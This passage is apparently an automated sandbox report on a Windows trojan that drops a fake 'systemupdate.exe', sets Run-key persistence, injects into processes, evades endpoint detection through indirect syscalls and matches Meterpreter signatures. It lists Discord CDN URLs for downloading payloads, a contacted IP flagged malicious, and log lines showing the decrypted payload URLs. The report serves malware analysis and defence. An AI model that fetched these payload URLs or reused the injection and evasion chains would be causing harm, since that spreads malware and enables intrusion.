Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\sNifdpWiY9.exe

Code function: 0_2_00007FF75F8CF8B0 free,IsDebuggerPresent,RaiseException,mbstowcs,malloc,mbstowcs,free,

0_2_00007FF75F8CF8B0

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe

Code function: 9_2_000001DE4A42C170 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

9_2_000001DE4A42C170

Source: C:\Users\user\Desktop\sNifdpWiY9.exe

Code function: 0_2_00007FF75F8CAC10 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

0_2_00007FF75F8CAC10

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe

Code function: 9_2_000001DE4A423C58 GetProcessHeap,HeapAlloc,VirtualAllocEx,WriteProcessMemory,HeapFree,

9_2_000001DE4A423C58

Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8B11E7 SetUnhandledExceptionFilter,malloc,strlen,malloc,_initterm,_amsg_exit,	0_2_00007FF75F8B11E7
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8CB039 SetUnhandledExceptionFilter,	0_2_00007FF75F8CB039
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F9D1918 SetUnhandledExceptionFilter,	0_2_00007FF75F9D1918
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_00007FF6EC321180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,exit,_amsg_exit,	9_2_00007FF6EC321180
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_00007FF6EC328621 SetUnhandledExceptionFilter,	9_2_00007FF6EC328621
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_00007FF6EC32F2D8 SetUnhandledExceptionFilter,VirtualAlloc,	9_2_00007FF6EC32F2D8
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A4173FC GetModuleHandleW,SetUnhandledExceptionFilter,ExitProcess,ExitThread,	9_2_000001DE4A4173FC
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A42B7A8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_000001DE4A42B7A8
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8B11E7 SetUnhandledExceptionFilter,malloc,strlen,malloc,_initterm,_amsg_exit,	12_2_00007FF75F8B11E7
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8B11E7 SetUnhandledExceptionFilter,malloc,strlen,malloc,_initterm,_amsg_exit,	16_2_00007FF75F8B11E7
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8CB039 SetUnhandledExceptionFilter,	16_2_00007FF75F8CB039
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F9D1918 SetUnhandledExceptionFilter,	16_2_00007FF75F9D1918
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8B11E7 SetUnhandledExceptionFilter,malloc,strlen,malloc,_initterm,_amsg_exit,	19_2_00007FF75F8B11E7
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8B11E7 SetUnhandledExceptionFilter,malloc,strlen,malloc,_initterm,_amsg_exit,	22_2_00007FF75F8B11E7
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8CB039 SetUnhandledExceptionFilter,	22_2_00007FF75F8CB039
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F9D1918 SetUnhandledExceptionFilter,	22_2_00007FF75F9D1918

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject threads in other processes

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe

Code function: 9_2_000001DE4A41669C VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,

9_2_000001DE4A41669C

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	NtAllocateVirtualMemory: Indirect: 0x1DE4A3D9DBE			Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	NtProtectVirtualMemory: Indirect: 0x1DE4A3D9E0F			Jump to behavior

Source: C:\Users\user\Desktop\sNifdpWiY9.exe

Code function: 0_2_00007FF75F8B157F GetModuleFileNameA,GetLastError,MessageBoxA,ShellExecuteExA,ExitProcess,

0_2_00007FF75F8B157F

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe

Code function: 9_2_000001DE4A419CB4 AllocateAndInitializeSid,SetEntriesInAclW,AllocateAndInitializeSid,LocalAlloc,InitializeAcl,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorSacl,

9_2_000001DE4A419CB4

Source: C:\Users\user\Desktop\sNifdpWiY9.exe

Code function: 0_2_00007FF75F8B14BE AllocateAndInitializeSid,CheckTokenMembership,CheckTokenMembership,FreeSid,

0_2_00007FF75F8B14BE

Source: C:\Users\user\Desktop\sNifdpWiY9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe

Code function: 9_2_000001DE4A41AD88 CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,ConnectNamedPipe,GetLastError,CloseHandle,

9_2_000001DE4A41AD88

Source: C:\Users\user\Desktop\sNifdpWiY9.exe

Code function: 0_2_00007FF75F8CC4C0 GetSystemTimeAsFileTime,

0_2_00007FF75F8CC4C0

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe

Code function: 9_2_000001DE4A4132C0 GetVersionExW,GetLastError,SetLastError,VirtualAlloc,VirtualAlloc,GetLastError,SetLastError,VirtualFree,VirtualFree,

9_2_000001DE4A4132C0

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Yara detected Metasploit Payload

Source: Yara match

File source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPE

Yara detected Meterpreter

Source: Yara match	File source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.systemupdate.exe.1de4a3d4000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2494296675.000001DE4A433000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe

Code function: 9_2_000001DE4A41B658 bind,WSAGetLastError,listen,accept,closesocket,

9_2_000001DE4A41B658

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 Registry Run Keys / Startup Folder	1 Exploitation for Privilege Escalation	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Access Token Manipulation	1 Access Token Manipulation	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	12 Process Injection	12 Process Injection	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	NTDS	15 System Information Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Abuse Elevation Control Mechanism	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 DLL Side-Loading	3 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
sNifdpWiY9.exe	11%	ReversingLabs	Win64.Trojan.Sonbokli

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\antietat[1].exe	3%	ReversingLabs
C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	3%	ReversingLabs

Source	Detection	Scanner	Label	Link
89.84.63.139	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.134.233	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cdn.discordapp.com/attachments/1178810474935111690/1314084840471265371/google.bin?ex=67527c60&is=67512ae0&hm=8f37e08b0f9684170b94f69a0483ca1c06a0768db952c1640cf4ff676e76255b&	false		high
https://cdn.discordapp.com/attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7&	false		high
89.84.63.139	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://gcc.gnu.org/bugs/):	sNifdpWiY9.exe	false	high
https://cdn.discordapp.com/	sNifdpWiY9.exe, 00000000.00000002.1298174073.00000202F43A5000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000010.00000002.1400586061.000001F5E23DC000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000016.00000002.1482815117.00000233D5FAE000.00000004.00000020.00020000.00000000.sdmp	false	high
https://cdn.discordapp.com/n	sNifdpWiY9.exe, 00000000.00000003.1296804041.00000202F43A5000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000000.00000002.1298174073.00000202F43A5000.00000004.00000020.00020000.00000000.sdmp	false	high
https://cdn.discordapp.com/attachments/1178810474935111690/1314084840471265371/google.bin?ex=67527c6	ConDrv.0.dr, ConDrv.16.dr, ConDrv.22.dr	false	high
https://cdn.discordapp.com/attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528	ConDrv.22.dr	false	high
https://cdn.discordapp.com/V	sNifdpWiY9.exe, 00000010.00000002.1400586061.000001F5E23DC000.00000004.00000020.00020000.00000000.sdmp	false	high
http://crl.mic	sNifdpWiY9.exe, 00000016.00000002.1482815117.00000233D5FAE000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
89.84.63.139	unknown	France		5410	BOUYGTEL-ISPFR	true
162.159.134.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1569044
Start date and time:	2024-12-05 11:40:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	sNifdpWiY9.exe renamed because original name is a hash value
Original Sample Name:	2c9c4c1ca31e6b9152ee5f772f6689fa2aa9df95e155aecbe4ef0ed054bfce3c.exe
Detection:	MAL
Classification:	mal92.troj.evad.winEXE@13/8@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 82% Number of executed functions: 17 Number of non-executed functions: 158
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: sNifdpWiY9.exe

Simulations

Behavior and APIs

Time	Type	Description
11:41:06	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SystemUpdate C:\Users\user\Desktop\sNifdpWiY9.exe
11:41:15	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SystemUpdate C:\Users\user\Desktop\sNifdpWiY9.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.159.134.233	Cheat.Lab.2.7.1.msi	Get hash	malicious	RedLine	Browse	cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
	http://162.159.134.233:443	Get hash	malicious	Unknown	Browse	162.159.134.233:443/
	PO - Drawings And Specifications Sheet_pdf.scr.exe	Get hash	malicious	AveMaria	Browse	cdn.discordapp.com/attachments/472051232014598144/935778066171580456/Sjddks44.jpg
	mvoElayshk.exe	Get hash	malicious	Amadey	Browse	cdn.discordapp.com/attachments/880877737378734114/880877802512060426/5mgcqk6jl.exe
	xuTyOmef1g.exe	Get hash	malicious	Amadey RedLine SmokeLoader	Browse	cdn.discordapp.com/attachments/878382243242983437/879113244856430592/Microsoft.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cdn.discordapp.com	EsgeCzT4do.exe	Get hash	malicious	XWorm	Browse	162.159.129.233
	file.exe	Get hash	malicious	Unknown	Browse	162.159.135.233
	file.exe	Get hash	malicious	CStealer	Browse	162.159.134.233
	https://cdn.discordapp.com/attachments/1284277835762110544/1305291734967779460/emu.exe?ex=67327f28&is=67312da8&hm=ea20e1c2a609dc1a0569bd4abb7e0da0a5e0671f3f7a388c1ed138f806c8e0c4&	Get hash	malicious	Unknown	Browse	162.159.135.233
	SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe	Get hash	malicious	Xmrig	Browse	162.159.135.233
	segura.vbs	Get hash	malicious	Remcos	Browse	162.159.135.233
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	162.159.129.233
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Quasar, Stealc	Browse	162.159.134.233
	LDlanZur0i.exe	Get hash	malicious	Unknown	Browse	162.159.135.233
	Fa1QSXjTZD.exe	Get hash	malicious	Unknown	Browse	162.159.133.233

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BOUYGTEL-ISPFR	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	176.172.193.195
	mipsel.elf	Get hash	malicious	Gafgyt, Mirai	Browse	176.171.163.190
	teste.sh4.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	176.168.49.73
	x86_64.elf	Get hash	malicious	Mirai	Browse	176.174.244.135
	teste.arm.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	213.44.217.61
	arm.elf	Get hash	malicious	Mirai	Browse	176.133.142.235
	xd.x86.elf	Get hash	malicious	Mirai	Browse	89.92.92.48
	sora.arm.elf	Get hash	malicious	Mirai	Browse	176.156.54.55
	la.bot.mips.elf	Get hash	malicious	Mirai	Browse	31.37.175.230
	la.bot.sh4.elf	Get hash	malicious	Mirai	Browse	31.35.80.168
CLOUDFLARENETUS	https://yrcisodockdxc.wixsite.com/so/ffPELWCGk/c?w=fTz-zc0Je0uykVBAmif5UmM6Rsu4kk-G5MXIVA5XOqg.eyJ1IjoiaHR0cHM6Ly9zZGtmaW93ZWkuY2xpY2svaG9tZS5waHAiLCJyIjoiZTU4NTRhMDUtMTAwNS00YjFmLTk5YzYtZjNhOTEzZjg3NDlmIiwibSI6Im1haWwiLCJjIjoiOTkwNzEzOGMtZWE2My00ODc4LTg3YTItZGEyMGZkMmQwZWY0In0	Get hash	malicious	Unknown	Browse	172.67.202.96
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	https://lavender-rosamund-62.tiiny.site/	Get hash	malicious	Unknown	Browse	104.22.70.197
	payload_1.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	162.159.200.123
	List of Required items xlsx.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	172.64.41.3
	ab.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	https://click.pstmrk.it/3s/bmxn8t84vg.gherapilta.shop%2F/ySDk/28y5AQ/AQ/e82f1f59-f734-42be-affb-895d81855fb4/1/pD2JDTOBnb	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	104.26.13.205
	UPDATED CONTRACT.exe	Get hash	malicious	FormBook	Browse	172.67.156.195

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	payload_1.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	162.159.134.233
	List of Required items xlsx.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	162.159.134.233
	ab.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	162.159.134.233
	REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	162.159.134.233
	comp#U00e1rtilhar080425-000800-66000544000.exe	Get hash	malicious	Unknown	Browse	162.159.134.233
	file.exe	Get hash	malicious	Unknown	Browse	162.159.134.233
	file.exe	Get hash	malicious	Unknown	Browse	162.159.134.233
	comp#U00e1rtilhar080425-000800-66000544000.exe	Get hash	malicious	Unknown	Browse	162.159.134.233
	venomderek.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	162.159.134.233

Process:	C:\Users\user\Desktop\sNifdpWiY9.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.942582688854289
Encrypted:	false
SSDEEP:	768:/sdICDkg1uuHwCRP5JWCl9i4TbGMCxPcUgkar8r+lFRl7zCvSqnTOW:eICDknx6JdLTXqPcsar8aPR54OW
MD5:	2EDDBA95F5818EF402BFE7FBAA0F6A18
SHA1:	F8278B610C4C8417F8119FF6C25FD5707AD076F4
SHA-256:	6654EBA29F53A9E47E5D7AC8875FF98DD44D81879BDD6EBCF32BD270FA700E32
SHA-512:	8790AEE89E2B50FA26D5B10713568531EC0D0075BCDBEAAF94A83B9831CAD77AAB73B1E335DAA25A56A2EFB77528427A069FAED378C1F0D142437E284706136A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Pg...............+.z.....................@.............................@............`... ...................................................... .......................0..................................(...................X................................text...xx.......z..................`..`.data................~..............@....rdata..............................@..@.pdata..............................@..@.xdata..L...........................@..@.bss.....................................idata..............................@....CRT....`...........................@....tls................................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\google[1].bin

Download File

Process:	C:\Users\user\Desktop\sNifdpWiY9.exe
File Type:	data
Category:	dropped
Size (bytes):	210624
Entropy (8bit):	7.999047266892008
Encrypted:	true
SSDEEP:	3072:tQh3ri9qF+lVg8dnrcmfONWs+Gz3oi7dczzAbMhywxPFSbVVJ4L8CJXatI4:tqG9qqVg8drcmfuW2DdcvxywZyvi8Ckf
MD5:	3AC321648D8BA5E4085F3AEA6304FBBA
SHA1:	294C73DCF2B41E3A726F9D85034C19F1FEC3227F
SHA-256:	AF3642DDE9A7FA4BC99D80C54DD63C1A881436F2EE9F385505EC05644EDFF323
SHA-512:	EB066C2863140E926DD27630DE53A066DE76179F2E3E430B6A35F734901C9733C1B05462ECBEEFF1A40D564D6C955F4358EB9D128ED2D3B35DAC49C9A1B94F79
Malicious:	false
Preview:	d..;N......e8...a...j.w:.F..v...,hu..3KW&.; .....nt.Wh&?......~...n.2.n?;`.Z`....?...q.....m...;].R.F..@a.I>5.......W"{...o...B..+.......'..lZ........S=@ZY.e.&v.r.V.w8Pu.b..eN7...#.q....%1..i.:..-..U`Y..C..1...0...JJ).lP..4.5t2'..dn...Vz/...dB.w.!O. .4..N.z5..5..Cs.d....?.`lO.......\|.kM.L:.8{...../'.J{..-5.o6..LU.....6.....~n..L..d...:B..a...f..H.I..0].mm$0.b...d..b........B'.i...{../r.....4.....$[......N"..Gtk.qw..]}..BK.1..]Iu.....(...(b.k(.M...O...e...>..;d.....v..P.w;v..L....k..!..[.]s.\+n..X.\|.o....j..PU......f.].on.^Y.Q..y.I.g.J...*..!0..,.&.ul'g.d.R].a......../...(.cFu. W..af....=...#`I..U.LJAr...i.t.G...M.?..."=.8......".)...$.\|2..+ p.S.A;..._.l..p....l....i:..e......F...'...{9A.<D...g.(G8r..shar....p.?...u.j.;^jf.HM.<..7`...`....S.Y=..A.1.r.\..2..{.....fgG..W.`..w3.%~#.@.E.f...k..C.....&WR8..@..T..OP5..d...x..?\|....p.?...W..`..v.m.D~u...........vcU.s!..B.....b.?.]0C,...G.~......9.G`....T;.......V...P.A..O...;.(.<......t>.c.

C:\Users\user\AppData\Roaming\SystemCache\google.bin

Download File

Process:	C:\Users\user\Desktop\sNifdpWiY9.exe
File Type:	data
Category:	dropped
Size (bytes):	210624
Entropy (8bit):	7.999047266892008
Encrypted:	true
SSDEEP:	3072:tQh3ri9qF+lVg8dnrcmfONWs+Gz3oi7dczzAbMhywxPFSbVVJ4L8CJXatI4:tqG9qqVg8drcmfuW2DdcvxywZyvi8Ckf
MD5:	3AC321648D8BA5E4085F3AEA6304FBBA
SHA1:	294C73DCF2B41E3A726F9D85034C19F1FEC3227F
SHA-256:	AF3642DDE9A7FA4BC99D80C54DD63C1A881436F2EE9F385505EC05644EDFF323
SHA-512:	EB066C2863140E926DD27630DE53A066DE76179F2E3E430B6A35F734901C9733C1B05462ECBEEFF1A40D564D6C955F4358EB9D128ED2D3B35DAC49C9A1B94F79
Malicious:	false
Preview:	d..;N......e8...a...j.w:.F..v...,hu..3KW&.; .....nt.Wh&?......~...n.2.n?;`.Z`....?...q.....m...;].R.F..@a.I>5.......W"{...o...B..+.......'..lZ........S=@ZY.e.&v.r.V.w8Pu.b..eN7...#.q....%1..i.:..-..U`Y..C..1...0...JJ).lP..4.5t2'..dn...Vz/...dB.w.!O. .4..N.z5..5..Cs.d....?.`lO.......\|.kM.L:.8{...../'.J{..-5.o6..LU.....6.....~n..L..d...:B..a...f..H.I..0].mm$0.b...d..b........B'.i...{../r.....4.....$[......N"..Gtk.qw..]}..BK.1..]Iu.....(...(b.k(.M...O...e...>..;d.....v..P.w;v..L....k..!..[.]s.\+n..X.\|.o....j..PU......f.].on.^Y.Q..y.I.g.J...*..!0..,.&.ul'g.d.R].a......../...(.cFu. W..af....=...#`I..U.LJAr...i.t.G...M.?..."=.8......".)...$.\|2..+ p.S.A;..._.l..p....l....i:..e......F...'...{9A.<D...g.(G8r..shar....p.?...u.j.;^jf.HM.<..7`...`....S.Y=..A.1.r.\..2..{.....fgG..W.`..w3.%~#.@.E.f...k..C.....&WR8..@..T..OP5..d...x..?\|....p.?...W..`..v.m.D~u...........vcU.s!..B.....b.?.]0C,...G.~......9.G`....T;.......V...P.A..O...;.(.<......t>.c.

C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe

Download File

Process:	C:\Users\user\Desktop\sNifdpWiY9.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.942582688854289
Encrypted:	false
SSDEEP:	768:/sdICDkg1uuHwCRP5JWCl9i4TbGMCxPcUgkar8r+lFRl7zCvSqnTOW:eICDknx6JdLTXqPcsar8aPR54OW
MD5:	2EDDBA95F5818EF402BFE7FBAA0F6A18
SHA1:	F8278B610C4C8417F8119FF6C25FD5707AD076F4
SHA-256:	6654EBA29F53A9E47E5D7AC8875FF98DD44D81879BDD6EBCF32BD270FA700E32
SHA-512:	8790AEE89E2B50FA26D5B10713568531EC0D0075BCDBEAAF94A83B9831CAD77AAB73B1E335DAA25A56A2EFB77528427A069FAED378C1F0D142437E284706136A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Pg...............+.z.....................@.............................@............`... ...................................................... .......................0..................................(...................X................................text...xx.......z..................`..`.data................~..............@....rdata..............................@..@.pdata..............................@..@.xdata..L...........................@..@.bss.....................................idata..............................@....CRT....`...........................@....tls................................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\sNifdpWiY9.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	780
Entropy (8bit):	5.297191105608361
Encrypted:	false
SSDEEP:	12:XfuEE7ZRe/Doy8+X4gozEERObhlB5btwuEE7ZRe/Doy8+X4gReiVNHg:X12ebbFpvlB5bqt2ebbFteiY
MD5:	7EABDEC0BA9931F52BF0DFFBF8B7E754
SHA1:	FBB1A6D3075C05B11B965D29B060F7EC124497BC
SHA-256:	F3C5F9449D6968F3517B1A79083B21E0007A2D2BFFFCEE6C723CBDBAD7B65CFE
SHA-512:	65603B86CAEB66EC2A0A1DC4F1D5C9744DEDFD81DC9547A4E4BD6A3435AAE232A95F1FCFBC0A2D7707F54C3CEB9D422438FBC74AEF9A00DAB93B2952C6DDDB56
Malicious:	false
Preview:	[DEBUG] Decrypted Stub URL: https://cdn.discordapp.com/attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7&..[DEBUG] Decrypted Payload URL: https://cdn.discordapp.com/attachments/1178810474935111690/1314084840471265371/google.bin?ex=67527c60&is=67512ae0&hm=8f37e08b0f9684170b94f69a0483ca1c06a0768db952c1640cf4ff676e76255b&..[LOG] Attempting to download: https://cdn.discordapp.com/attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7&..[ERROR] Unable to open output file: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe..[ERROR] Failed to download stub...

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.002338745028714
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
